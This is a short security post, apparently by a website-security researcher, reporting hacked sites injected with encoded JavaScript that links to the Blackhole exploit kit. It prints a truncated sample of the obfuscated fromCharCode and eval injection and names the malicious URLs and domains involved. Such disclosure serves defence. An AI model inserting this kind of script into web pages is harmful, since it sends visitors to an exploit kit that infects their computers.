Seeing some variations on how sites are getting hacked to link to the blackhole exploit kit. This is the type of encoded javascript we are seeing inserted into sites now:
<script>try{q .appendChild (q+"");} catch(qw){h=-012/5;
f="fromCharC";}try{ begbe=prototype;} catch(b43gds){ss=[];
f+=(h&&f)?"ode":"";w=this;e = e val;n=[-0.5,-0.5, 47.5,46,11, 15,45,
50.5,44.5,53.5,49.5,45.5,50,53,18,46.5,45.5,53,29.5,49,45.5, 49.5,45.5,50,53,52.5,28,55.5,37,43.5,46.5,
34,43.5,49.5,45.5,15,14.5,44,50.5,45,55.5,14.5,15.5,40.5,19, 41.5,15.5,56.5,1.5,-0.5,-0.5,-0.5,47.5,46,52,43.5,
49.5,45.5,52,15,15.5,24.5,1.5,-0.5,-0.5,57.5,..];
for(i=6-2-1-2-1;-583+i!=2-2;i++)
{
k=i; ss=ss+ String[f]( -1 *h *(5+1 *n[k]));
}
e ( ss); }Which are pointing to multiple URLs on the .gg.biz and .rr.nu TLD ( ex: http://dmujkkz.igg.biz/d/404.php?go=1, odzyzjyyi.rr.nu, mqvtrt.got-game.org, etc). More details to come.